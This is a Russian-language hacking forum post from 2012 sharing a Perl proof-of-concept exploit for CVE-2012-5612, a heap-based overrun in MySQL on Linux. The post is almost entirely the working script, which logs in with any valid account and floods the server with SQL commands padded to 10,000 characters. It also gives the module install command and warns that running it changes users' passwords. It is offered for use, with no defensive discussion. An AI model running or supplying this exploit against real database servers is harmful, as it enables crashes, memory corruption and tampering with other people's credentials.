Старый 02.12.2012, 18:44   #1
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию CVE: 2012-5612 MySQL (Linux) Heap Based Overrun PoC Zeroday

требуется любой юзер и пароль для коннекта в БД

Код:
use Net::MySQL;
use Encode;
$|=1;
 
  my $mysql = Net::MySQL->new(
      hostname => '127.0.0.1',
      database => "phpmyadmin",
      user     => "root",
      password => "root",
      debug => 0,
      port => 3306,
  );
 
@commands = ('USE d', 'SHOW TABLES FROM d', "DESCRIBE t", "SHOW FIELDS FROM t", "SHOW COLUMNS FROM t", "SHOW INDEX FROM t",
             "CREATE TABLE table_name (c CHAR(1))", "DROP TABLE t", "ALTER TABLE t DROP c",
             "DELETE FROM t WHERE 1=1", "UPDATE t SET a=a","SET PASSWORD=PASSWORD('p')");
   
foreach my $command (@commands) {
    for ($k=0;$k<length($command);$k++) {
        $c = substr($command, 0, $k) . "Z" x 10000 . substr($command, $k+1);
        $c2 = substr($command, 0, $k) . "AAAA..AA" . substr($command, $k+1);
         
        print "$c2";
        $mysql->query($c);
    }
}
  $mysql->close
для запуска сплойта необходим модуль:

sudo cpan -i Net::MySQL


в результате работы сплойта пароли юзеров меняются!

http://www.exploit-db.com/exploits/23076/
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot